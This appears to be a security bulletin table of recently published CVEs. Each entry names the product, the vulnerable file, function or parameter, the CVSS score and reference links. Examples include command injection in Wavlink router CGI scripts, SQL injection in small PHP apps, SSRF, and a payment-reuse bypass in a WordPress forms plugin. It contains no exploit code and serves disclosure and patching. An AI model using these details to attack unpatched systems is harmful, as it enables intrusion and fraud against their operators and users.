| chatchat-space--Langchain-Chatchat | A vulnerability was detected in chatchat-space Langchain-Chatchat up to 0.3.1.3. This vulnerability affects the function files/list_files/retrieve_file/retrieve_file_content/delete_file of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Compatible File Service. The manipulation results in missing authentication. The attacker must have access to the local network to execute the attack. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 6.3 | CVE-2026-7844 | VDB-361123 | chatchat-space Langchain-Chatchat Compatible File Service openai_routes.py delete_file missing authentication VDB-361123 | CTI Indicators (IOB, IOC, IOA) Submit #807790 | chatchat-space Langchain-Chatchat 0.3.1.3 Missing Authorization / CWE-862 https://github.com/chatchat-space/Langchain-Chatchat/issues/5465 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-4-Missing-Auth-File-Endpoints.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| MongoDB Inc.--MongoDB Server | An authenticated user can crash mongod when running $rankFusion or $scoreFusion with an empty pipeline on a view. When resolving a view, the server inspects the aggregation pipeline to determine whether it begins with an Atlas Search stage. For $rankFusion and $scoreFusion, this inspection reads the first element on each stage's input pipeline array without first verifying that the array is non-empty. Supplying an empty pipeline causes a null pointer dereference and crashes the server. This issue affects MongoDB Server 8.2 versions prior to 8.2.7. | 2026-05-07 | 6.5 | CVE-2026-8063 | https://jira.mongodb.org/browse/SERVER-121851 |
| router-for-me--CLIProxyAPI | A vulnerability has been found in router-for-me CLIProxyAPI 6.9.29. Affected by this issue is some unknown functionality of the file internal/api/handlers/management/api_tools.go of the component API Interface. The manipulation of the argument url leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-07 | 6.3 | CVE-2026-8081 | VDB-361836 | router-for-me CLIProxyAPI api_tools.go server-side request forgery VDB-361836 | CTI Indicators (IOB, IOC, IOA) Submit #807811 | router-for-me CLIProxyAPI 6.9.29 Server-Side Request Forgery https://github.com/m3ngx1ng/cve/blob/main/CLIProxyAPI-SSRF.md |
| CodeAstro--Online Classroom | A security flaw has been discovered in CodeAstro Online Classroom 1.0. This vulnerability affects unknown code of the file /askquery.php. The manipulation of the argument squeryx results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. | 2026-05-07 | 6.3 | CVE-2026-8097 | VDB-361849 | CodeAstro Online Classroom askquery.php sql injection VDB-361849 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808115 | codeastro Online Classroom V1.0 SQL Injection http://github.com/suze233/CVE/issues/1 https://codeastro.com/ |
| 8421bit--MiniClaw | A vulnerability was found in 8421bit MiniClaw up to 223c16a1088e138838dcbd18cd65a37c35ac5a84. Affected is the function executeCognitivePulse of the file src/kernel.ts. Performing a manipulation results in os command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The patch is named 028f62216dee9f64833d0f1cfda7c217067ceba8. To fix this issue, it is recommended to deploy a patch. | 2026-05-07 | 6.3 | CVE-2026-8112 | VDB-361900 | 8421bit MiniClaw kernel.ts executeCognitivePulse os command injection VDB-361900 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808166 | 8421bit MiniClaw 0 OS Command Injection https://github.com/8421bit/MiniClaw/issues/4 https://github.com/8421bit/MiniClaw/pull/7 https://github.com/8421bit/MiniClaw/commit/028f62216dee9f64833d0f1cfda7c217067ceba8 https://github.com/8421bit/MiniClaw/ |
| n/a--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.1. Affected by this issue is some unknown functionality of the file /sys/dict/loadTreeData of the component JSON Object Handler. The manipulation of the argument condition leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor confirms (translated from Chinese): "It should have been fixed; a batch of issues were recently resolved." | 2026-05-07 | 6.3 | CVE-2026-8114 | VDB-361902 | JeecgBoot JSON Object loadTreeData sql injection VDB-361902 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808186 | https://github.com/jeecgboot/JeecgBoot <=3.91 SQL Injection https://github.com/jeecgboot/JeecgBoot/issues/9571 https://github.com/jeecgboot/JeecgBoot/ |
| huangjunsen0406--xiaozhi-mcphub | A weakness has been identified in huangjunsen0406 xiaozhi-mcphub up to 1.0.3. This vulnerability affects unknown code of the file src/controllers/dxtController.ts. This manipulation of the argument manifest.name causes path traversal. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-07 | 6.3 | CVE-2026-8116 | VDB-361904 | huangjunsen0406 xiaozhi-mcphub dxtController.ts path traversal VDB-361904 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808260 | huangjunsen0406 xiaozhi-mcphub 1.0.3 Path Traversal https://github.com/huangjunsen0406/xiaozhi-mcphub/issues/29 https://github.com/huangjunsen0406/xiaozhi-mcphub/ |
| code-projects--Simple Chat System | A vulnerability was detected in code-projects Simple Chat System 1.0. This vulnerability affects unknown code of the file sendMessage.php. The manipulation of the argument type/length/business parameter validity results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-08 | 6.3 | CVE-2026-8125 | VDB-361915 | code-projects Simple Chat System sendMessage.php sql injection VDB-361915 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808679 | code-projects Simple Chat System v1.0 SQL Injection https://github.com/MICHEY-Ben/cve/issues/1 https://code-projects.org/ |
| n/a--eladmin | A vulnerability has been found in eladmin up to 2.7. Impacted is the function checkLevel of the file /rest/UserController.java of the component Users API Endpoint. Such manipulation leads to improper access controls. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 6.3 | CVE-2026-8127 | VDB-361917 | eladmin Users API Endpoint UserController.java checkLevel access control VDB-361917 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808771 | eladmin 2.7 Improper Access Controls https://github.com/elunez/eladmin/issues/897 |
| UGREEN--CM933 | A security vulnerability has been detected in UGREEN CM933 1.1.59.4319. The impacted element is an unknown function of the component Administrative Interface. Such manipulation leads to missing authentication. The attack requires being on the local network. You should upgrade the affected component. The vendor replied: "We have successfully confirmed and reproduced the issue. We take this matter very seriously and have incorporated the fix into our development schedule. The issue is scheduled to be resolved in the release version coming in late April." | 2026-05-09 | 6.3 | CVE-2026-8185 | VDB-362337 | UGREEN CM933 Administrative missing authentication VDB-362337 | CTI Indicators (IOB, IOC) Submit #793588 | UGREEN CM933 Managed Network Switch 1.1.59.4319 CWE-306: Missing Authentication for Critical Function |
| Wavlink--NU516U1 | A vulnerability has been found in Wavlink NU516U1 M16U1_V240425. Affected is the function change_wifi_password of the file /cgi-bin/adm.cgi. The manipulation of the argument wl_channel/wl_Pass/EncrypType leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8188 | VDB-362340 | Wavlink NU516U1 adm.cgi change_wifi_password os command injection VDB-362340 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800727 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_1/1.md |
| Wavlink--NU516U1 | A vulnerability was found in Wavlink NU516U1 M16U1_V240425. Affected by this vulnerability is the function wzdrepeater of the file /cgi-bin/adm.cgi. The manipulation of the argument wlan_bssid/sel_Automode/sel_EncrypTyp results in os command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8189 | VDB-362341 | Wavlink NU516U1 adm.cgi wzdrepeater os command injection VDB-362341 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800728 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_2/2.md |
| Wavlink--NU516U1 | A vulnerability was determined in Wavlink NU516U1 M16U1_V240425. Affected by this issue is the function wan of the file /cgi-bin/adm.cgi. This manipulation of the argument ppp_username/ppp_passwd/rwan_ip/rwan_mask/rwan_gateway is directly passed by the attacker/so we can control the ppp_username/ppp_passwd/rwan_ip/rwan_mask/rwan_gateway causes os command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8190 | VDB-362342 | Wavlink NU516U1 adm.cgi wan os command injection VDB-362342 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800729 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_3/3.md |
| Wavlink--NU516U1 | A vulnerability was identified in Wavlink NU516U1 M16U1_V240425. This affects the function wifi_region of the file /cgi-bin/adm.cgi. Such manipulation of the argument skiplist1/skiplist2 leads to os command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8191 | VDB-362343 | Wavlink NU516U1 adm.cgi wifi_region os command injection VDB-362343 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800730 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_4/4.md |
| Wavlink--NU516U1 | A security flaw has been discovered in Wavlink NU516U1 M16U1_V240425. This vulnerability affects the function wzdap of the file /cgi-bin/adm.cgi. Performing a manipulation of the argument EncrypType/wl_Pass is directly passed by the attacker/so we can control the EncrypType/wl_Pass results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure. | 2026-05-09 | 6.3 | CVE-2026-8192 | VDB-362344 | Wavlink NU516U1 adm.cgi wzdap os command injection VDB-362344 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800731 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_5/5.md |
| n/a--Akaunting | A weakness has been identified in Akaunting 3.1.21. This issue affects some unknown processing of the file config/dompdf.php of the component Invoice PDF Rendering. Executing a manipulation can lead to server-side request forgery. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 6.3 | CVE-2026-8193 | VDB-362345 | Akaunting Invoice PDF Rendering dompdf.php server-side request forgery VDB-362345 | CTI Indicators (IOB, IOC, IOA) Submit #800984 | akaunting 3.1.21 Server-Side Request Forgery https://drive.google.com/file/d/1zC8gMYeIfZi3CsK6RXBQINU_mllXH_6n/view?usp=drive_link |
| Industrial Application Software IAS--Canias ERP | A security flaw has been discovered in Industrial Application Software IAS Canias ERP 8.03. Impacted is the function Runtime.getRuntime.exec of the component RMI Interface. Performing a manipulation of the argument troiaCode results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 6.3 | CVE-2026-8217 | VDB-362434 | Industrial Application Software IAS Canias ERP RMI Runtime.getRuntime.exec os command injection VDB-362434 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808262 | Industrial Application Software - IAS Canias ERP 8.03-- Code Injection - Remote Code Execution - (CWE-94/CWE-78) https://hawktrace.com/blog/caniaserp https://gist.github.com/0xb1lal/6ccc2356e7e0a26f7b8a6bd6f0d84bbb |
| Wavlink--NU516U1 | A weakness has been identified in Wavlink NU516U1 240425. This issue affects the function wzdapMesh of the file /cgi-bin/adm.cgi. This manipulation causes os command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8227 | VDB-362444 | Wavlink NU516U1 adm.cgi wzdapMesh os command injection VDB-362444 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800732 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_6/6.md |
| Wavlink--NU516U1 | A security vulnerability has been detected in Wavlink NU516U1 240425. Impacted is the function advance of the file /cgi-bin/wireless.cgi. Such manipulation of the argument wlan_conf/Channel/skiplist/ieee_80211h leads to os command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8228 | VDB-362445 | Wavlink NU516U1 wireless.cgi advance os command injection VDB-362445 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800733 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_7/7.md |
| Wavlink--NU516U1 | A vulnerability was detected in Wavlink NU516U1 240425. The affected element is the function WifiBasic of the file /cgi-bin/wireless.cgi. Performing a manipulation of the argument AuthMethod/EncrypType results in os command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8229 | VDB-362446 | Wavlink NU516U1 wireless.cgi WifiBasic os command injection VDB-362446 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800734 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_8/8.md |
| Wavlink--NU516U1 | A flaw has been found in Wavlink NU516U1 240425. The impacted element is the function sys_login1 of the file /cgi-bin/login.cgi. Executing a manipulation of the argument ipaddr can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure. | 2026-05-10 | 6.3 | CVE-2026-8230 | VDB-362447 | Wavlink NU516U1 login.cgi sys_login1 os command injection VDB-362447 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800735 | Wavlink NU516U1 M16U1_V240425 Command Injection https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_9/9.md |
| CodeAstro--Online Catering Ordering System | A vulnerability has been found in CodeAstro Online Catering Ordering System 1.0. This affects an unknown function of the file /deleteorder.php. The manipulation of the argument ID leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-05-10 | 6.3 | CVE-2026-8231 | VDB-362448 | CodeAstro Online Catering Ordering System deleteorder.php sql injection VDB-362448 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808783 | codeastro Online Catering Ordering System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/63 https://codeastro.com/ |
| Opencart--OpenCart | OpenCart 3.0.36 contains a cross-site request forgery vulnerability in the /account/edit endpoint that allows unauthenticated attackers to modify victim account details by tricking users into visiting malicious pages. Attackers can craft CSRF payloads that change victim email addresses and account information, then use password reset functionality to gain unauthorized access to compromised accounts. | 2026-05-10 | 5.3 | CVE-2021-47946 | ExploitDB-49407 Official Product Homepage Product Reference VulnCheck Advisory: OpenCart 3.0.36 Account Takeover via Cross Site Request Forgery |
| invoicing--Payments Plugin GetPaid | WordPress GetPaid Plugin 2.4.6 contains an HTML injection vulnerability that allows authenticated attackers to inject arbitrary HTML code by exploiting the Help Text field in payment forms. Attackers can inject malicious HTML including image tags and scripts into the Help Text field during payment form creation, which gets stored in the database and executed in the browser when the form is viewed. | 2026-05-10 | 5.4 | CVE-2021-47948 | ExploitDB-50246 Product Reference VulnCheck Advisory: WordPress GetPaid Plugin 2.4.6 HTML Injection via Help Text |
| Getaawp--WordPress Plugin AAWP | WordPress Plugin AAWP 3.16 contains a reflected cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by manipulating the tab parameter. Attackers can craft URLs with XSS payloads in the tab parameter of the aawp-settings admin page to execute arbitrary JavaScript in the context of authenticated users. | 2026-05-10 | 5.4 | CVE-2022-50970 | ExploitDB-50643 Official Product Homepage VulnCheck Advisory: WordPress Plugin AAWP 3.16 Reflected XSS via tab Parameter |
| Hitachi--Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900 | Improper restriction of excessive authentication attempts vulnerability in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28. This issue affects Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28 : before DKCMAIN Ver 88-08-16-xx/00, GUM Ver. 88-08-20/00, before DKCMAIN Ver 93-07-26-xx/00, GUM Ver. 93-07-26/00, before DKCMAIN Ver A3-04-02-xx/00, EMS Ver. A3-04-02/00, before DKCMAIN Ver A3-03-41-xx/00, EMS Ver. A3-03-41/00, before DKCMAIN Ver A3-03-03-xx/00, EMS Ver. A3-03-02/00. | 2026-05-07 | 5.3 | CVE-2025-2514 | https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_306.html |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is vulnerable to information exposure due to improper error handling within its reporting module. It was observed that supplying an invalid or out-of-range value to the consumer_company parameter during a report-viewing request causes the application to trigger an unhandled exception. | 2026-05-06 | 5.3 | CVE-2025-31960 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Insecure Security Header configuration vulnerability where the Content-Security-Policy does not define strict directives for object-src and base-uri, which could allow an attacker to exploit injection vectors such as Cross-Site Scripting (XSS) | 2026-05-06 | 5.3 | CVE-2025-31970 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| WEN Themes--WEN Logo Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WEN Themes WEN Logo Slider allows DOM-Based XSS. This issue affects WEN Logo Slider: from n/a through 3.4.0. | 2026-05-07 | 5.9 | CVE-2025-62127 | https://patchstack.com/database/wordpress/plugin/wen-logo-slider/vulnerability/wordpress-wen-logo-slider-plugin-3-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Magepeople inc.--Bus Ticket Booking with Seat Reservation | Missing Authorization vulnerability in Magepeople inc. Bus Ticket Booking with Seat Reservation allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bus Ticket Booking with Seat Reservation: from n/a before 5.6.8. | 2026-05-07 | 5.3 | CVE-2025-66105 | https://patchstack.com/database/wordpress/plugin/bus-ticket-booking-with-seat-reservation/vulnerability/wordpress-bus-ticket-booking-with-seat-reservation-plugin-5-6-8-broken-access-control-vulnerability?_s_id=cve |
| WPGraphQL--WPGraphQL | Cross-Site Request Forgery (CSRF) vulnerability in WPGraphQL allows Cross Site Request Forgery. This issue affects WPGraphQL: from n/a through 2.5.3. | 2026-05-07 | 5.4 | CVE-2025-68604 | https://patchstack.com/database/wordpress/plugin/wp-graphql/vulnerability/wordpress-wpgraphql-plugin-2-5-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in an identity management API endpoint of Cisco ISE could allow an unauthenticated, remote attacker to enumerate valid user accounts on an affected device. This vulnerability exists because error messages are observed when the affected API endpoint is called. An attacker could exploit this vulnerability by sending a series of crafted requests to the affected endpoint and analyzing the differentiated responses. A successful exploit could allow the attacker to compile a list of valid usernames on an affected system. | 2026-05-06 | 5.3 | CVE-2026-20195 | cisco-sa-ise-unauth-bypass-uxjRXGpb |
| Cisco--Cisco Webex Meetings | A vulnerability in the REST API of Cisco Slido could have allowed an authenticated, remote attacker to access the social profile data of other users or affect quiz and poll results. Cisco has addressed this vulnerability in Cisco Slido and no customer action is needed. This vulnerability existed because of the presence of an insecure direct object reference. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by sending a crafted request to the vulnerable API endpoint. A successful exploit could have allowed the attacker to view the social profiles of other users or affect quiz and poll results. | 2026-05-06 | 5.4 | CVE-2026-20219 | cisco-sa-slido-idor-CpsFmKxN |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing IOCTL command when device is in power-save state. | 2026-05-04 | 5.5 | CVE-2026-25266 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| WProyal--Royal Elementor Addons | Missing Authorization vulnerability in WProyal Royal Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Royal Elementor Addons: from n/a before 1.7.1053. | 2026-05-07 | 5.3 | CVE-2026-25436 | https://patchstack.com/database/wordpress/plugin/royal-elementor-addons/vulnerability/wordpress-royal-elementor-addons-plugin-1-7-1053-broken-access-control-vulnerability?_s_id=cve |
| weDevs--Happy Addons for Elementor | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs Happy Addons for Elementor allows Retrieve Embedded Sensitive Data. This issue affects Happy Addons for Elementor: from n/a through 3.20.8. | 2026-05-07 | 5.3 | CVE-2026-25468 | https://patchstack.com/database/wordpress/plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.52.0. This is due to the plugin not properly verifying that a user is authorized to perform an action when processing attacker-supplied Stripe PaymentIntent identifiers in the public payment flow. This makes it possible for unauthenticated attackers to submit high-value paid forms as completed by reusing a previously succeeded low-value Stripe PaymentIntent, resulting in underpayment/payment bypass conditions. | 2026-05-05 | 5.3 | CVE-2026-2729 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1afb94ab-b3ba-4598-8ff4-f9ffc6717371?source=cve https://plugins.trac.wordpress.org/changeset/3500669/forminator |
| YITH--YITH WooCommerce Wishlist | Authorization Bypass Through User-Controlled Key vulnerability in YITH YITH WooCommerce Wishlist allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects YITH WooCommerce Wishlist: from n/a through 4.12.0. | 2026-05-07 | 5.3 | CVE-2026-27329 | https://patchstack.com/database/wordpress/plugin/yith-woocommerce-wishlist/vulnerability/wordpress-yith-woocommerce-wishlist-plugin-4-12-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| bPlugins--PDF Poster | Missing Authorization vulnerability in bPlugins PDF Poster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF Poster: from n/a through 2.4.1. | 2026-05-07 | 5.3 | CVE-2026-27416 | https://patchstack.com/database/wordpress/plugin/pdf-poster/vulnerability/wordpress-pdf-poster-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| traccar--traccar | Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the KML and GPX export functionality writes device names to XML output without proper escaping. An attacker with low privileges can create a device with a crafted name that injects XML content into exported files. If another user exports and opens the affected KML or GPX file, this can corrupt the file structure and spoof exported location data. This issue is fixed in version 6.13.0. | 2026-05-05 | 5.4 | CVE-2026-27693 | https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656 https://github.com/traccar/traccar/blob/v6.11.0/src/main/java/org/traccar/reports/GpxExportProvider.java#L52-L54 |
| traccar--traccar | Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0. | 2026-05-05 | 5.4 | CVE-2026-27694 | https://github.com/traccar/traccar/security/advisories/GHSA-6hfr-mj4m-hrvv |
| elabftw--elabftw | eLabFTW is an open source electronic lab notebook. In elabftw versions through 5.4.1, the login flow did not reliably preserve the multi-factor authentication state across authentication steps. Under certain conditions, an attacker with valid primary credentials could complete authentication with an attacker-controlled TOTP secret and bypass the additional factor. This could result in unauthorized account access. This issue is fixed in version 5.4.2. | 2026-05-05 | 5.9 | CVE-2026-28510 | https://github.com/elabftw/elabftw/security/advisories/GHSA-x5wv-c9q4-fj65 https://github.com/elabftw/elabftw/commit/8b7a575aef128870861187eaa2b2f0f08654ecf9 |
| n/a--Pluck CMS | Cross Site Scripting vulnerability in Pluck CMS before v.4.7.21dev allows a remote attacker to escalate privileges via the editpage.php and the sanitizePageContent function | 2026-05-04 | 5.7 | CVE-2026-31205 | https://github.com/pluck-cms/pluck/blob/main/data/inc/functions.all.php#L207 https://github.com/pluck-cms/pluck/blob/main/data/inc/editpage.php https://github.com/pluck-cms/pluck/issues/141 https://medium.com/@nakah_/pluck-cms-stored-xss-in-page-editor-cve-2026-31205-3b0526743e1d?postPublishedType=initial |
| mercadopago--Mercado Pago payments for WooCommerce | The Mercado Pago payments for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'mp_pix_image' WooCommerce API endpoint in all versions up to, and including, 8.7.11. This makes it possible for unauthenticated attackers to retrieve PIX payment QR code images for arbitrary orders. PIX QR codes contain sensitive merchant information including PIX keys (which may be CPF/CNPJ personal identifiers), transaction amounts, merchant name and city, and MercadoPago transaction references. | 2026-05-06 | 5.3 | CVE-2026-3208 | https://www.wordfence.com/threat-intel/vulnerabilities/id/986e0252-b94d-4ac8-9083-0218fa8a651e?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L358 https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L92 https://plugins.trac.wordpress.org/changeset?old_path=%2Fwoocommerce-mercadopago/tags/8.7.11&new_path=%2Fwoocommerce-mercadopago/tags/8.7.12 |
| EZVIZ--EZVIZ APP | Some EZVIZ products utilize older versions of cloud feature modules with legacy API interfaces, which pose a data transmission risk. Attackers can exploit this by eavesdropping on network requests to obtain data.Users are advised to upgrade the app to the latest version and enable the video encryption feature. | 2026-05-09 | 5.3 | CVE-2026-32683 | https://www.ezviz.com/inter/trust-center/security/security-notice/2026.05.08 https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-cloud-function-modules-of-some-hikvisi/ |
| Red Hat--Fast Datapath for RHEL 7 | A flaw was found in Open vSwitch. When Open vSwitch is configured with a conntrack flow using FTP helpers over the userspace datapath, a remote attacker can send a specially crafted FTP stream with an EPASV command exceeding 255 characters. This heap access error can lead to a crash, resulting in a Denial of Service (DoS) for the affected system. | 2026-05-05 | 5.9 | CVE-2026-34956 | https://access.redhat.com/security/cve/CVE-2026-34956 RHBZ#2453459 |
| ZTE--ZTE PROCESS Guard service | There is a local privilege escalation vulnerability in the ZTE PROCESS Guard service of the cloud computer client, which may allow local arbitrary code execution, privilege escalation and path traversal bypass. | 2026-05-06 | 5.2 | CVE-2026-40001 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/1477954674427011121 |
| ZTE--ZX297520V3 BootROM | ZTE ZX297520V3 BootROM contains a vulnerability that allows arbitrary memory writes via USB. Attackers can exploit the lack of target address validation in the USB download mode to write data to any location in BootROM runtime memory, thereby overwriting the stack, hijacking the execution flow, bypassing the Secure Boot signature verification mechanism, and achieving unauthorized code execution. | 2026-05-07 | 5.1 | CVE-2026-40003 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2144487415169560645 |
| ZTE--ZXCLOUD iRAI | There exists an openssl.cnf privilege escalation vulnerability in ZTE Cloud PC client uSmartview. An attacker can execute arbitrary code locally and escalate privileges. | 2026-05-07 | 5.5 | CVE-2026-40004 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3126272076755775573 |
| PHPOffice--PhpSpreadsheet | PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The HTML writer skips htmlspecialchars escaping when a cell's formatted value differs from the original value. When a cell has a custom number format containing the text placeholder @ along with any additional literal characters (for example ". @", "@ ", or "x@"), the formatter replaces @ with the cell value and adds the extra characters, causing the formatted value to differ from the original and bypassing HTML escaping entirely. An attacker who can control the cell value and number format of an uploaded spreadsheet that is later converted to HTML and displayed to other users can achieve stored cross-site scripting. This issue is fixed in versions 5.7.0, 3.10.5, 2.4.5, 2.1.16, and 1.30.4. | 2026-05-06 | 5.4 | CVE-2026-40296 | https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc |
| open-telemetry--opentelemetry-dotnet | OpenTelemetry.Exporter.Zipkin is the .NET Zipkin exporter for OpenTelemetry. In versions 1.15.2 and earlier, the Zipkin exporter remote endpoint cache accepts unbounded key growth derived from span attributes. In high-cardinality scenarios, a process using Zipkin export for client or producer spans could experience avoidable memory growth under sustained unique remote endpoint values, increasing process memory usage over time and degrading availability. This issue is fixed in version 1.15.3, which introduces a bounded, thread-safe LRU cache for remote endpoints with a fixed maximum size. | 2026-05-06 | 5.3 | CVE-2026-41310 | https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-88hf-wf7h-7w4m https://github.com/open-telemetry/opentelemetry-dotnet/pull/7081 |
| istio--istio | Istio is an open platform to connect, manage, and secure microservices. Prior to versions 1.28.6 and 1.29.2, when a RequestAuthentication resource is created with a jwksUri pointing to an internal service, istiod makes an unauthenticated HTTP GET request to that URL without filtering out localhost or link local ips. This can result in sensitive data being distributed to Envoy proxies via xDS configuration. This issue has been patched in versions 1.28.6 and 1.29.2. | 2026-05-07 | 5 | CVE-2026-41413 | https://github.com/istio/istio/security/advisories/GHSA-fgw5-hp8f-xfhc https://github.com/istio/istio/releases/tag/1.28.6 https://github.com/istio/istio/releases/tag/1.29.2 |
